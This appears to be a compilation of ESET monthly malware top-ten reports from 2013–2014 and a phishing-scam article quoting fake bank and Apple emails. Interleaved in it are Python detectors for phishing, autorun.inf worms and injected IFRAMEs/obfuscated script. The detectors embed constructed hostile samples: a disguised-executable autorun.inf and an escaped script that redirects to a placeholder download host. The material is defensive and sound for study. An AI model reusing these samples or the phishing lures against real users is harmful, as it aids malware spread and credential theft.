Monthly Threat Report: March 2014


The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 2.88%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL and tries to download several files from that address over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. LNK/Agent.AK

Previous Ranking: 2
Percentage Detected: 1.87%

LNK/Agent.AK is a shortcut (link) that chains commands so that the genuine application or folder opens as expected while the threat also runs in the background. It could become the successor to the autorun.inf threat. The vulnerability became known when Stuxnet was discovered, as it was one of the four vulnerabilities that threat exploited.

3. Win32/Sality

Previous Ranking: 3
Percentage Detected: 1.66%

Sality is a polymorphic file infector. When run, it starts a service, creates and deletes registry keys related to security activity on the system, and ensures that its malicious process is started at every reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. INF/Autorun

Previous Ranking: 4
Percentage Detected: 1.57%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes such malware easy for a scanner applying this heuristic to spot, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.

5. Win32/Qhost

Previous Ranking: 5
Percentage Detected: 1.51%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

6. HTML/ScrInject

Previous Ranking: 6
Percentage Detected: 1.36%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect the browser to a malware download.

7. Win32/Conficker

Previous Ranking: 8
Percentage Detected: 1.28%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145.

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.27%

Win32/Ramnit is a file infector: a virus that executes at every system start. It infects DLL and EXE files and also searches for HTM and HTML files in which to write malicious instructions. It exploits a vulnerability in the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down or restart the computer.

9. Win32/Dorkbot

Previous Ranking: 9
Percentage Detected: 1.07%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

10. JS/FBook

Previous Ranking: n/a
Percentage Detected: 0.95%

JS/FBook is a trojan used for delivery of unsolicited advertisements. The trojan does not create any copies of itself, and the program code is usually embedded in HTML pages.

Monthly Threat Report: February 2014


The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 2.9%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL and tries to download several files from that address over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. LNK/Agent.AK

Previous Ranking: 5
Percentage Detected: 1.86%

LNK/Agent.AK is a shortcut (link) that chains commands so that the genuine application or folder opens as expected while the threat also runs in the background. It could become the successor to the autorun.inf threat. The vulnerability became known when Stuxnet was discovered, as it was one of the four vulnerabilities that threat exploited.

3. Win32/Sality

Previous Ranking: 2
Percentage Detected: 1.67%

Sality is a polymorphic file infector. When run, it starts a service, creates and deletes registry keys related to security activity on the system, and ensures that its malicious process is started at every reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. INF/Autorun

Previous Ranking: 4
Percentage Detected: 1.57%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes such malware easy for a scanner applying this heuristic to spot, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.

5. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.55%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

6. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.54%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect the browser to a malware download.

7. Win32/Ramnit

Previous Ranking: 6
Percentage Detected: 1.27%

Win32/Ramnit is a file infector: a virus that executes at every system start. It infects DLL and EXE files and also searches for HTM and HTML files in which to write malicious instructions. It exploits a vulnerability in the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down or restart the computer.

8. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.26%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145.

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

9. Win32/Dorkbot

Previous Ranking: 10
Percentage Detected: 1.1%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

10. Win32/TrojanDownloader.Waski

Previous Ranking: n/a
Percentage Detected: 1.02%

Win32/TrojanDownloader.Waski is a trojan which tries to download other malware from the Internet. It contains a list of two URLs and tries to download a file from the addresses. The HTTP protocol is used. The file is stored in the location %temp%\miy.exe, and is then executed.

Phishing Scam Update

by David Harley, ESET North America, and Urban Schrott, ESET Ireland

It may seem at the moment that I don’t write about anything apart from phishing scams and tech support scams. That’s not actually the case, but scammers don’t seem to take holidays, and a couple of things have come along that I couldn’t resist mentioning.

The first has the subject “RBS – Working to protect you and your card.” It appears to come from CreditCardOnlineServices(at)cards.rbs.co.uk.

RBS Credit Card Account Holder:

Your RBS Credit Card is designed to help keep you safe
Receive alerts when we spot a suspicious transaction
Sometimes we spot what looks like a fraudulent transaction on your credit card – so to make sure, we’ll call you and check. Better still, why not join our free fraud text alert service?
It’s just another way we’re working to keep your card and your money safe.
To sign-up for this service, simply visit our
fraud text alert website.

Why is this interesting? Well, there are a couple of things here that indicate a scam.

  • The giveaway absence of personalization – if you’re one of a financial institution’s customers, there’s no excuse for not addressing you by name and proving that they know something about you that a scammer wouldn’t.
  • We’ve neutralized the link to the so-called text alert website, but it led to a site that had nothing to do with RBS or even the UK – it appeared to have a Swedish domain name – and actually contained other pages masquerading as other banks.

Apart from that – and the fact that I don’t have an RBS card! – there isn’t much here to indicate to the average user that it’s a scam. The English isn’t ‘foreign’ and does a good job of capturing the tone of a chatty advertising mailshot.

And here’s another one from ‘Lloyds’. Bizarrely, though at first sight the sender appears to be Lloyds Personal Banking, the actual mail address is toilet@ebay.com. It pays to check the mailbox address as well as the display name (Lloyds Personal Banking in this case), even though there’s no guarantee that the address used is a genuine address.

Resolving An Issue With Your Account
Dear Valued Customer
We need your help resolving an issue with your account. To give us to to work together on this, we’ve temporarily limited what you can do with your account until the issue is resolved.
How you can help
It’s usually pretty easy to take care of things like this. Most of the time, we just need a little more information about your account or latest transactions.
To help us with this and to find out what you can and can’t do with your account until the issue is resolved.click on the ink below to resolve issue

Log in here to resolve issue.

Sincerely,
Lloyds Bank


This one also lacks personalization and also links to a URL with no connection to Lloyds or the UK. The proofreader was a bit slack, too – “click on the ink below…” – and the English is a little more – well, unEnglish… Still, it’s noticeable that the scammer was aiming for the same chattier, more idiomatic style, and there’s some novelty to that.

Meanwhile, my colleague Urban Schrott has been writing for ESET Ireland about scams that have crossed his radar. While there’s no disputing the lengths Apple goes to defend its customers from security threats, it’s not possible for an operating system provider or security vendor to provide absolute protection for the user of any platform or security software from his own lack of caution. As Urban points out, if users are overconfident of the absolute security of their computing environment, “…that confidence can work against them when it comes to social engineering, particularly phishing, as they tend to trust “official” looking websites more [than they should] and cybercriminals know and abuse this to the maximum.”

As an example, he describes how a very realistic-looking phishing email is being received by Irish users, using the usual Apple visual cues and leading to a faked iTunes Connect login site at an address that several security vendors have noted is associated with malware distribution, and which harvests users’ iTunes login details. He notes that it “still lets you in if you enter any made-up nonsense though.”

The prospective victim (addressed generically, of course, as ‘Dear Apple Customer’) is told that “in order to get back into your apple account, you’ll need to confirm your account. It’s easy: Click the link below to open a secure browser window. Confirm that you’re the owner of the account and then follow the instructions. .”


While the mail looks fairly realistic (with an Apple logo and so on), there are one or two details that you might have spotted: the failure to capitalize Apple; a couple of proofing errors (the unfortunate space between ‘account’ and the following period, and two periods separated by a space at the end of the paragraph); and the capitalized Click after a colon, which is common US usage but not common in the UK or Ireland.

The fake iTunes Connect login is even more US-centric. Once “logged in”, the page asks you to “confirm” many of your personal details, including your credit card number and security code, your password and sort code, but also your Social Security number. Are there that many Americans in Ireland, I wonder?
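The three tells this article keeps coming back to (a display name that does not match the real sender address, no personalization, and links to a domain with no connection to the claimed bank) can be checked mechanically. The following is an added example, not code from ESET or the author: BRAND_DOMAINS, the public-suffix shortlist and both sample messages are constructed for it, and registered_domain() only approximates proper public-suffix handling.

```python
"""Indicator checks for the phishing tells described above.

Added example, not code from ESET or the article's author: given a raw
e-mail it reports a sender address whose domain does not belong to the
brand named in the display name or text, a generic salutation, and links
whose domain is unrelated to that brand. BRAND_DOMAINS, the suffix list and
both sample messages are constructed for this example; registered_domain()
approximates public-suffix handling rather than implementing it fully.
"""
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brand keyword -> domains that brand genuinely uses (constructed allow-list).
BRAND_DOMAINS = {
    "rbs": {"rbs.co.uk"},
    "lloyds": {"lloydsbank.com"},
    "apple": {"apple.com"},
}
# Second-level public suffixes, so that cards.rbs.co.uk reduces to rbs.co.uk.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au", "co.nz"}
GENERIC_SALUTATION_RE = re.compile(
    r"\b(dear\s+(valued\s+)?(\w+\s+)?(customer|client|member|user)|account holder)\b",
    re.I)


def registered_domain(host: str) -> str:
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]


def extract_links(html: str) -> list:
    collector = _LinkCollector()
    collector.feed(html)
    return collector.hrefs


def message_body(msg) -> str:
    """Decode and join the text/html and text/plain parts."""
    chunks = []
    for part in msg.walk():  # walk() yields the message itself when not multipart
        if part.get_content_type() in ("text/html", "text/plain"):
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def phishing_indicators(raw_message: str) -> list:
    msg = email.message_from_string(raw_message)
    display_name, address = parseaddr(msg.get("From", ""))
    sender_domain = registered_domain(address.rsplit("@", 1)[1]) if "@" in address else ""
    body = message_body(msg)
    haystack = f"{display_name} {msg.get('Subject', '')} {body}".lower()
    brands = [b for b in BRAND_DOMAINS if b in haystack]   # brand(s) the mail claims to be from
    allowed = set().union(*(BRAND_DOMAINS[b] for b in brands))
    found = []
    if brands and sender_domain and sender_domain not in allowed:
        found.append(f"sender domain {sender_domain} is not a {'/'.join(brands)} domain")
    if GENERIC_SALUTATION_RE.search(body):
        found.append("generic salutation, no personalization")
    for url in extract_links(body):
        host = urlparse(url).hostname or ""
        if brands and host and registered_domain(host) not in allowed:
            found.append(f"link points at {registered_domain(host)}, unrelated to the claimed brand")
    return found


# Constructed message modelled on the 'Lloyds' mail quoted above; the link
# host is a placeholder, not the address the real scam used.
SCAM_MAIL = """\
From: "Lloyds Personal Banking" <toilet@ebay.com>
Subject: Resolving An Issue With Your Account
Content-Type: text/html; charset=utf-8

<html><body><p>Dear Valued Customer</p>
<p>We need your help resolving an issue with your account.</p>
<p><a href="http://secure-login.example.net/lloyds/">Log in here to resolve issue.</a></p>
</body></html>
"""

# Constructed message with the tells absent: named recipient, matching domains.
PLAUSIBLE_MAIL = """\
From: "Lloyds Bank" <alerts@lloydsbank.com>
Subject: Your statement is ready
Content-Type: text/html; charset=utf-8

<html><body><p>Dear Ms Example</p>
<p>Your statement is available at <a href="https://www.lloydsbank.com/">lloydsbank.com</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    for label, mail in (("scam", SCAM_MAIL), ("plausible", PLAUSIBLE_MAIL)):
        print(label, phishing_indicators(mail) or ["no indicators"])
```

As the article notes, a matching address is no guarantee of authenticity, so an empty indicator list means only that these particular tells are absent.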

Monthly Threat Report: October 2013


The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.9%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL and tries to download several files from that address over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. INF/Autorun

Previous Ranking: 2
Percentage Detected: 2.1%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes such malware easy for a scanner applying this heuristic to spot, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.

3. Win32/Sality

Previous Ranking: 3
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run, it starts a service, creates and deletes registry keys related to security activity on the system, and ensures that its malicious process is started at every reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/Iframe

Previous Ranking: 4
Percentage Detected: 1.9%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL hosting malicious software.

5. HTML/ScrInject

Previous Ranking: 5
Percentage Detected: 1.78%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect the browser to a malware download.

6. Win32/Dorkbot

Previous Ranking: 6
Percentage Detected: 1.62%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

7. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.61%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.45%

Win32/Ramnit is a file infector: a virus that executes at every system start. It infects DLL and EXE files and also searches for HTM and HTML files in which to write malicious instructions. It exploits a vulnerability in the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down or restart the computer.

9. Win32/TrojanDownloader.Small.AAB

Previous Ranking: n/a
Percentage Detected: 1.34%

Win32/TrojanDownloader.Small.AAB is a trojan which tries to download other malware from the Internet. When executed, it copies itself into the %temp%\hcbnaf.exe location. The trojan contains a URL address, and it tries to download a file from the address.

10. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.09%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

Monthly Threat Report: September 2013


1. Win32/Bundpil

Previous Ranking: 2
Percentage Detected: 3.69%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL and tries to download several files from that address over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. INF/Autorun

Previous Ranking: 5
Percentage Detected: 2.08%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes such malware easy for a scanner applying this heuristic to spot, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.
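The INF/Autorun heuristic described in each monthly report above comes down to reading the directives in autorun.inf that make Windows run something. The following is an added example, not ESET's detection code: it lists those directives, notes the disguise signs that separate a worm's file from a vendor install disc, and shows why a plain launch directive alone cannot be treated as malicious, which is the report's argument for disabling Autorun. The two sample files and the tag names are constructed for the example.

```python
"""Heuristic review of an autorun.inf file.

Added example, not ESET's detection code: it lists the directives that make
Windows launch a program when removable media is inserted or opened (the
behaviour behind the INF/Autorun label) and notes the extra signs that
separate a worm's file from a vendor install disc. The sample files and
the tag names are constructed for this example.
"""
import re

# Directives Windows acts on: open/shellexecute run on insertion when Autorun
# is enabled; shell\<verb>\command rewires Explorer's Open/Explore actions.
LAUNCH_KEYS = {"open", "shellexecute"}
VERB_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$")
# Folders Explorer hides by default and executable extensions worms favour
# (a small constructed list, not an exhaustive indicator set).
HIDDEN_DIR_RE = re.compile(
    r"(^|\\)(recycler|\$recycle\.bin|system volume information)(\\|$)", re.I)
EXEC_EXT_RE = re.compile(r"\.(exe|scr|pif|cmd|bat|vbs|com)(\s|$)", re.I)
DOUBLE_EXT_RE = re.compile(r"\.\w{2,4}\.(exe|scr|pif|cmd|bat|vbs|com)(\s|$)", re.I)


def parse_autorun(text: str) -> dict:
    """Tolerant INI parse. Infected autorun.inf files are often padded with
    junk lines and repeat keys, so configparser's strict mode is avoided;
    section and key names are lower-cased as Windows ignores their case."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue  # padding or stray text outside any section
        key, _, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def inspect_autorun(text: str) -> list:
    """Return (section, key, target, tags) for every launch directive found.
    Tags: launch, exec-ext, double-ext, hidden-dir."""
    findings = []
    for section, pairs in parse_autorun(text).items():
        for key, value in pairs:
            if key not in LAUNCH_KEYS and not VERB_COMMAND_RE.match(key):
                continue
            target = value.strip('"')
            tags = ["launch"]
            if DOUBLE_EXT_RE.search(target):
                tags.append("double-ext")
            elif EXEC_EXT_RE.search(target):
                tags.append("exec-ext")
            if HIDDEN_DIR_RE.search(target):
                tags.append("hidden-dir")
            findings.append((section, key, target, tags))
    return findings


def risk_level(text: str) -> str:
    """'none' when nothing would run, 'review' for a plain launch directive
    (a vendor install disc looks like this too, which is why the report
    advises disabling Autorun), 'high' when disguise signs are present."""
    findings = inspect_autorun(text)
    if not findings:
        return "none"
    if any({"double-ext", "hidden-dir"} & set(tags) for *_, tags in findings):
        return "high"
    return "review"


# Constructed sample in the style of a removable-media worm's autorun.inf
# (not taken from any real sample): insertion and Explorer's verbs all run
# the same disguised executable from a folder Explorer hides.
WORM_INF = """\
[autorun]
;   ; padding lines like these are common in infected media
open=RECYCLER\\S-1-5-21-0-0-0-1000\\holiday.jpg.exe
shell\\open\\command=RECYCLER\\S-1-5-21-0-0-0-1000\\holiday.jpg.exe
shell\\explore\\command=RECYCLER\\S-1-5-21-0-0-0-1000\\holiday.jpg.exe
icon=%SystemRoot%\\system32\\shell32.dll,4
action=Open folder to view files
"""

# Constructed sample of a vendor install disc: it launches a program too.
INSTALL_INF = """\
[autorun]
open=setup.exe
icon=setup.exe,0
label=Printer driver CD
"""

if __name__ == "__main__":
    for name, inf in (("worm", WORM_INF), ("install disc", INSTALL_INF)):
        print(name, risk_level(inf))
        for section, key, target, tags in inspect_autorun(inf):
            print(f"  [{section}] {key} -> {target}  {tags}")
```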

3. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.05%

Sality is a polymorphic file infector. When run, it starts a service, creates and deletes registry keys related to security activity on the system, and ensures that its malicious process is started at every reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/Iframe

Previous Ranking: 1
Percentage Detected: 1.78%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL hosting malicious software.

5. HTML/ScrInject

Previous Ranking: 3
Percentage Detected: 1.73%

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect the browser to a malware download.
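The HTML/Iframe and HTML/ScrInject entries in the reports above describe two page features: an IFRAME the visitor is not meant to see, and script that is mostly escape sequences handed to an evaluator. The following is an added example, not ESET's detection logic, of a scanner that flags both; the thresholds, the placeholder hosts and the sample page are constructed for it.

```python
"""Heuristics for injected IFRAMEs and obfuscated script in an HTML page.

Added example, not ESET's detection logic: it flags a hidden IFRAME loading
another site and a script whose text is mostly escape sequences passed to an
evaluator. The thresholds and the sample page are constructed for this
example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}", re.I)
SINK_RE = re.compile(r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(", re.I)
ESCAPE_RE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.I)
ESCAPE_DENSITY_LIMIT = 0.3  # fraction of script bytes that are escape sequences


def _px(value: str) -> int:
    """Width/height attribute to pixels; anything unparsable counts as visible."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 100


class PageScanner(HTMLParser):
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []   # (kind, detail, reason)
        self._script = None  # collects script text while inside <script>

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(attrs)
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            code, self._script = "".join(self._script), None
            self._check_script(code)

    def _check_iframe(self, attrs):
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or self.page_host).lower()
        tiny = any(_px(attrs.get(d)) <= 1 for d in ("width", "height"))
        hidden = tiny or bool(HIDDEN_STYLE_RE.search(attrs.get("style", "")))
        if hidden and host != self.page_host:
            self.findings.append(("iframe", src, "hidden iframe loading another site"))
        elif hidden:
            self.findings.append(("iframe", src, "hidden iframe on the same site; review"))

    def _check_script(self, code):
        if not code.strip():
            return
        escaped = sum(len(m) for m in ESCAPE_RE.findall(code))
        density = escaped / len(code)
        sinks = sorted({s.lower() for s in SINK_RE.findall(code)})
        if sinks and density > ESCAPE_DENSITY_LIMIT:
            self.findings.append(("script", ",".join(sinks),
                                  f"escape density {density:.2f} passed to {', '.join(sinks)}"))


def scan_html(html: str, page_host: str) -> list:
    scanner = PageScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: ordinary content, one injected 0x0 IFRAME pointing at a
# placeholder host, one script that unescapes a redirect, and a normal
# visible embed that must not be flagged.
_ENCODED = "".join(f"%{ord(c):02X}" for c in 'location.href="http://dl.example.net/get"')
SAMPLE_PAGE = f"""<html><head><title>News</title>
<script>function show() {{ document.getElementById('more').style.display = 'block'; }}</script>
</head><body><p>Normal article text.</p>
<iframe src="http://dl.example.net/land" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape("{_ENCODED}"));</script>
<iframe src="https://www.example.org/embed/clip" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail, reason in scan_html(SAMPLE_PAGE, "news.example.org"):
        print(f"{kind}: {reason} ({detail})")
```

Obfuscation that avoids percent and hex escapes (string splitting, character arithmetic) passes this density test, which is why such labels are generic and tuned continually rather than fixed rules.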

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.59%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX. The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.58%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

